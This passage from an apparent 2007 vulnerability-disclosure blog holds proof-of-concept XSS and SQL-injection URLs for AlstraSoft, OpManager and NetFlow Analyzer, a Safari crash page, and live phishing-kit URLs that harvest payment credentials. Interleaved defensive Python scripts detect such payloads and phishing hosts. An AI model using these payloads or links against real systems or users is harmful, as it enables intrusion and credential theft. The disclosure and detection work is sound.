http://[Victim]/affiliate/merchants/index.php?Act=
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS

http://[Victim]/affiliate/merchants/index.php?Act=
daily&d=9&m=07&y=2007 // all variables XSS affected except Act

http://[Victim]/affiliate/merchants/index.php?Act=
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date
"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007
&programs=All // all variables XSS affected except Act and sub

http://[Victim]/affiliate/merchants/temp.php?rowid=
5"><script>alert()</script> // possible SQL too

http://[Victim]/affiliate/merchants/index.php?Act=
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>
&modofpay=Authorize.net&bankname=&bankno=&
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=

####################################
AlstraSoft Article Manager Pro
####################################

http://[Victim]/article/contact_author.php?
userid=1%20"><script>alert()</script>

#######################################
AlstraSoft AskMe Pro
#######################################

http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL

http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL

http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>
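The request shapes in the AlstraSoft, ifoto and other advisories here (a `"><script>` payload in a parameter, `../` traversal in `dir`, an `or 1=1` tautology in a numeric id, and percent-encoded variants of each) are what a web log review should surface. The following Python log scanner is an added example, not part of the original advisory: it parses constructed Apache combined-format lines (sample data, not real traffic), percent-decodes every path, parameter name and value up to twice so that single, double and byte-by-byte hex encodings all normalize to the same text, and then applies one rule per payload class.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" request line: client, timestamp, method, target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) \S+')

# Detection rules applied to each percent-decoded, lower-cased component.
RULES = [
    ("xss", re.compile(
        r"<\s*/?\s*(script|iframe|body|img|svg|object|embed)\b|javascript\s*:|\bon\w+\s*=")),
    ("traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("sqli", re.compile(r"\b(or|and)\s+\d+\s*=\s*\d+|'\s*(or|and)\b|\bunion\s+select\b")),
]

# Constructed log lines (not real traffic) shaped like the requests in these
# advisories: an XSS payload in a value, a ../ traversal, an 'or 1=1' tautology,
# a byte-by-byte hex-encoded tag, a benign request, and a double-encoded <script>.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jul/2007:10:01:02 +0200] "GET /videoshare/video.php?page=5%22%3E%3Cscript%3Ealert()%3C/script%3E HTTP/1.1" 200 512
10.0.0.6 - - [22/Jul/2007:10:01:09 +0200] "GET /ifoto/?dir=..%2F..%2F..%2F..%2Fetc HTTP/1.1" 200 2048
10.0.0.7 - - [22/Jul/2007:10:01:15 +0200] "GET /videoshare/uvideos.php?UID=253%20or%201=1 HTTP/1.1" 200 9001
10.0.0.8 - - [22/Jul/2007:10:01:20 +0200] "GET /map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%73%63%72%69%70%74%3E HTTP/1.1" 200 300
10.0.0.9 - - [22/Jul/2007:10:01:25 +0200] "GET /videoshare/video.php?page=5&category=tf HTTP/1.1" 200 700
10.0.0.10 - - [22/Jul/2007:10:01:30 +0200] "GET /viking/search.php?search=%253Cscript%253E&act=dosearch HTTP/1.1" 200 700
"""


def normalize(raw, rounds=2):
    """Decode '+' and percent-escapes up to `rounds` times so that %3C, %253C
    and byte-by-byte hex encodings all compare as the same decoded text."""
    cur = raw.replace("+", " ")
    for _ in range(rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur.lower()


def components(target):
    """Yield (where, param, raw) for the path and every query name and value;
    names are scanned too because several advisories inject into them."""
    parts = urlsplit(target)
    yield "path", None, parts.path
    if parts.query:
        for pair in parts.query.split("&"):
            name, _, value = pair.partition("=")
            yield "name", name, name
            yield "value", name, value


def scan_target(target):
    """Apply every rule to every decoded component of one request target."""
    hits = []
    for where, param, raw in components(target):
        decoded = normalize(raw)
        for rule, pattern in RULES:
            match = pattern.search(decoded)
            if match:
                hits.append({"rule": rule, "where": where,
                             "param": unquote(param) if param is not None else None,
                             "evidence": match.group(0)})
    return hits


def scan_log(text):
    """Parse each log line and collect rule hits together with the client."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        for hit in scan_target(target):
            findings.append({"client": client, "method": method, "status": status,
                             "target": target, **hit})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']:10} {f['rule']:9} {f['where']}={f['param']!r:12} {f['evidence']!r}")
```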

###################### €nd ########################

Thnx to estrella for being my light.
Thnx to all Lostmon Team !!!

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
Curiosity is what makes the mind move....

Crashing Safari 3.0.2 for windows Step by Step

Friday, July 13, 2007
Safari for Windows 3.0.2 crash, step by step

http://www.apple.com/safari/download/


The bug comes from the Activity window when managing
different tabs across the Activity window.
I reported it to the vendor and they are working on
debugging this flaw and others (I think).

Version affected:

Safari for Windows 3.0.2 (512.13.1)
I don't know if this issue could be reproduced
in other versions.

And I don't know if with this issue a local or
remote user can execute code.

Let's go

1 - open a Safari window.
2 - open a new tab in the same window (now we are in the second tab)
3 - open Window/Activity (we have the two tabs)
4 - click on the first tab in the Activity window (Safari crashes)

other way :

1 open a Safari window (window 1)
2 open a new tab in window 1
3 open a new Safari window (window 2)
4 open a new tab in window 2 (now we are in window 2, tab 2)
5 open Window/Activity (we have the four tabs)
6 double click on any tab of window 1 (Safari crashes)

I am working on an HTML file to demonstrate that this possible vuln can be exploited
by a remote user. Any suggestion or idea is welcome at Lostmon@gmail.com
Thnx to all !!

Watch this 'mov' to follow the step by step in the video:




Thnx to estrella for being my light.
Thnx to all Lostmon Team !!!

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
Curiosity is what makes the mind move....

NetFlow Analyzer 5 & OpManager 7 multiple XSS

Wednesday, July 04, 2007
###################################################
NetFlow Analyzer 5 & OpManager 7 multiple XSS
vendor url:http://www.adventnet.com/
advisory:http://lostmon.blogspot.com/2007/07/
netflow-analizer-5-opmanager-7-multiple.html
vendor notify:yes exploits include:yes
Secunia:SA25947 SA20067,
BID:24767, 24766
SecWatch:SWID1018376, SWID1018377
###################################################

NetFlow Analyzer and OpManager contain a flaw that allows
a remote cross-site scripting attack. This flaw exists
because the application does not validate multiple parameters
upon submission to multiple scripts. This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
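The parameters listed in the examples below are reflected into the response without validation or output encoding, which is what makes the crafted URLs work. The following Python script is an added example, not code from this advisory or from AdventNet: it decodes the query string of web-server request lines, flags any parameter whose decoded value contains an HTML tag (the kind of check a log-triage or WAF rule performs), and shows the server-side fix, HTML-escaping the value before it is written back into the page. The request lines are constructed, modelled on the advisory's URLs with the payloads shortened; one of them is double-encoded to show why the decoder loops.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request lines modelled on the advisory's URLs (payloads shortened);
# not real traffic from any OpManager or NetFlow Analyzer install.
SAMPLE_REQUESTS = [
    "GET /map/ping.do?name=192.168.1.2 HTTP/1.1",
    "GET /map/ping.do?name=192.168.1.2%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1",
    "GET /devices/Search.do?searchTerm=core%20router&requestid=SNAPSHOT HTTP/1.1",
    # double-encoded: %2522 decodes to %22 and only then to a quote
    "GET /netflow/jspui/index.jsp?grID=-1&view=groups%2522%253E%253Cbody%253E%253Ch1%253Ehi HTTP/1.1",
]

# An opening or closing HTML tag name; enough to catch the attribute-breaking
# '"><tag>' pattern the advisory uses, without trying to be a full HTML parser.
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.IGNORECASE)


def fully_decode(value: str) -> str:
    """Percent-decode until the value stops changing, so double encoding
    (%2522 -> %22 -> ") does not slip past the check."""
    previous = None
    while value != previous:
        previous, value = value, unquote(value)
    return value


def suspicious_params(request_line: str) -> list[tuple[str, str]]:
    """Return (parameter, decoded value) pairs whose value contains an HTML tag."""
    _method, target, _version = request_line.split(" ", 2)
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = fully_decode(value)  # parse_qsl already removed one layer
        if TAG_RE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan(request_lines: list[str]) -> dict[str, list[tuple[str, str]]]:
    """Map each request line that carries a tag-bearing parameter to its hits."""
    findings = {}
    for line in request_lines:
        hits = suspicious_params(line)
        if hits:
            findings[line] = hits
    return findings


def render_ping_form(name: str) -> str:
    """Server-side fix: a reflected value must be encoded for the context it
    lands in. html.escape(quote=True) neutralises <, >, &, " and ', which
    covers both the HTML-text and the quoted-attribute contexts used here."""
    safe = html.escape(name, quote=True)
    return f'<input type="text" name="name" value="{safe}">'


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(line)
        for param, value in hits:
            print(f"  {param} = {value!r}")
    print(render_ping_form('192.168.1.2"><script>'))
```

The detector is intentionally narrow (a tag name after `<`); it exists to show the decode-then-inspect order, not to replace a proper WAF rule set. The durable fix is the encoding in `render_ping_form`: the value stays inside the attribute no matter what the client sent.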



#####################
Versions affected:
#####################

OpManager 7
OpManager 6

NetFlow Analyzer 5

Other versions may be vulnerable too.

###################
Solution:
###################

No solution was available at this time !!!

##################
Time Line
##################

Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:-----
disclosure:04-07-2007

###################
Examples
###################

To exploit some of the flaws you need to log in.

#####################
OpManager
#####################

http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C
%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3
D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57
%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7
2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%
73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E
%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E


http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22
%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E
%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%
3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E

http://localhost:8080/devices/Search.do?searchTerm=sss%22%
3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3
C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F
%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected
Tab=Map


http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil


http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E

http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil


http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter

http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation


http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations

http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E


#######################
NetFlow Analyzer
#######################

http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E

http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62

http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos

http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1

http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E

http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true

#################### €nd ################################

Thnx to estrella for being my light.
Thnx to all Lostmon Team !!!


Skype Phishing and other payment method scams

Sunday, June 17, 2007
################################################
Skype Phishing and other payment method scams
###############################################

Today I received an email asking me to update
the information of my Skype account (a system I don't use).


It's a new way to get hold of the passwords of
unwary users; but this one goes a bit further.

If, unfortunately, we visit the malicious site:

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/login.html

besides losing our Skype account we have much
more to lose, since the malicious page will also try,
through deception, to get hold of several of our
passwords or important details of our online
payment methods.

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/c2.php

Our PayPal account:

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/PayPal%20-%20Log%20In.htm


Our Moneybookers account:

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/book1.htm

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/bookf.htm

as well as the possible details of our Visa and/or MasterCard card.


Make sure that the addresses you visit are the authentic ones
of the payment sites; if not, don't enter any data in them, and
even when they are legitimate, you should be just as wary.
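The advice above ("make sure the address is the authentic one") can be turned into a check: the kit quoted in this post is served from ac-amiens.fr while the brand name appears only inside the path, which is the opposite of how a real login page is hosted. The Python script below is an added example, not part of the original post; it extracts the registrable domain of a URL and reports any brand the URL name-drops (in the host labels, path or query) without being served from that brand's own domain. The brand-to-domain table is an assumption for the example, and the last three URLs in the sample are constructed; the first two are the kit's pages quoted above.

```python
from urllib.parse import urlsplit

# Brands the phishing kit in this post imitates, with the domains they really
# use. Assumed table for the example; extend it for your own environment.
PROTECTED_BRANDS = {
    "skype": {"skype.com"},
    "paypal": {"paypal.com"},
    "moneybookers": {"moneybookers.com"},
}

# The first two URLs are the kit's pages quoted in the post; the rest are
# constructed: two legitimate logins and one brand-as-subdomain lookalike.
SAMPLE_URLS = [
    "http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/login.html",
    "http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/PayPal%20-%20Log%20In.htm",
    "https://www.paypal.com/signin",
    "https://secure.skype.com/account/login",
    "http://paypal.com.example.net/login",
]


def registrable_domain(host: str) -> str:
    """Crude eTLD+1: the last two labels. Good enough for .com/.fr; a real
    deployment would consult the Public Suffix List (co.uk and friends)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def impersonated_brands(url: str) -> list[str]:
    """Brands a URL name-drops without being served from that brand's own domain.

    The check is host-first on purpose: a brand word anywhere in the host
    labels, path or query is only suspicious when the registrable domain is
    not one the brand owns. Browsers show the host; phishers hide the brand
    in the path ('.../skype.com/.../login.html') or in a subdomain."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    domain = registrable_domain(host)
    haystack = f"{host}{parts.path}?{parts.query}".lower()
    return sorted(
        brand
        for brand, owned in PROTECTED_BRANDS.items()
        if domain not in owned and brand in haystack
    )


def triage(urls: list[str]) -> dict[str, list[str]]:
    """URL -> impersonated brands, keeping only the URLs that trip the check."""
    findings = {}
    for url in urls:
        brands = impersonated_brands(url)
        if brands:
            findings[url] = brands
    return findings


if __name__ == "__main__":
    for url, brands in triage(SAMPLE_URLS).items():
        print(f"{url}\n  looks like: {', '.join(brands)}")
```

Note the limit of a brand-word heuristic: the kit's Moneybookers pages are named book1.htm and bookf.htm, so nothing in those URLs mentions the brand and they are not flagged. What still protects the user there is the first half of the check, the host: whatever the page looks like, it is served from ac-amiens.fr, not from any payment provider.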

################## €nd ###################################


Safari 3.0.1 (552.12.2) for Windows corefoundation.dll DoS

Saturday, June 16, 2007
############################################
Safari 3.0.1 (552.12.2) for Windows corefoundation.dll DoS
Vendor Url: www.apple.com/safari/
Advisory: http://lostmon.blogspot.com/2007/06/
safari-301-552122-for-windows.html
Vendor notify: yes exploit available: yes
BID: 24497
###########################################

Safari contains a flaw that may allow a remote denial of service.
The issue is triggered when specially crafted input is processed
by the web browser. The crashes occur due to issues with the
functions that manage the History and "all History", and will result
in a loss of availability for the application. I don't know if this
can execute arbitrary code.



#############
versions:
#############

Safari 3.0.1

###########
solution:
###########

Update to version 3.0.2

##########
timeline:
##########

discovered:14-06-2007
vendor notify:15-06-2007
vendor response:
disclosure:16-06-2007

#####################
details of the crash
#####################

see the screenshot:

http://www.spymac.com/upload/2007/06/15/iBvYpCnJFW.gif

--

Crash !

AppName: safari.exe AppVer: 3.522.12.2 ModName: corefoundation.dll
ModVer: 1.434.6.0 Offset: 000097cd

#################
Safari Crash Poc
#################
Save this file as an HTML document and open it in Safari;
put some number in the second form and Safari crashes.

<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title>
<body>
<p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p>
<p> Put some number in the second form for crash Safari</p>
<form id="historyForm1" method="GET" action="#">
<input type="text" id="currentIndex1" name="currentIndex" value="sss">
<textarea id="historyLocation1" name="historyLocation"></textarea>
<form id="historyForm2" method="GET" action="#">
<input type="text" id="currentIndex2" name="currentIndex">
<textarea id="historyLocation2" name="historyLocation"></textarea>
</form></form></body></html>

#################### €nd #####################

Thnx to estrella for being my light
Thnx to all Lostmon's Groups
Thnx to all who believe in me !!


Buffer overflow in extended file attributes in Explorer.exe

Monday, June 04, 2007
#######################################################
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Buffer overflow in extended file attributes.
Vendor url: http://www.microsoft.com/
Advisory: http://lostmon.blogspot.com/2007/06/
buffer-overflow-in-extended-file.html
Vendor notify: yes Vendor confirmed: yes Exploit included: NO
#######################################################

################
SUMMARY:
################

1- History (how and why)
2- Explanation of the buffer overflow
3- Versions tested
4- Solution
5- Timeline
6- Response from vendor
7- Test
8- Related vulns and documentation



####################
1-History:
####################


If we look at this M$ advisory, the information in this section:

http://www.microsoft.com/technet/security/advisory/933052.mspx

--
Mitigating Factors for Microsoft Word Remote Code Execution Vulnerability:

The vulnerability cannot be exploited automatically through e-mail.
For an attack to be successful, a user must open an attachment that
is sent in an e-mail message.
--

this is not entirely true :)

If the user downloads the file and puts it in a folder, Explorer
crashes when the folder is opened...

If you open any program that uses the Windows API and ole32.dll to
open files, go to File/Open and browse to the folder with the
malformed doc file, Explorer calls ole32.dll, the program
crashes and all unsaved information is lost.

Examples of this case:

notepad++ => http://notepad-plus.sourceforge.net/es/site.htm
(vendor notified on 27-05-2007 via email, no response)

Multiple Macromedia family programs => http://www.macromedia.com
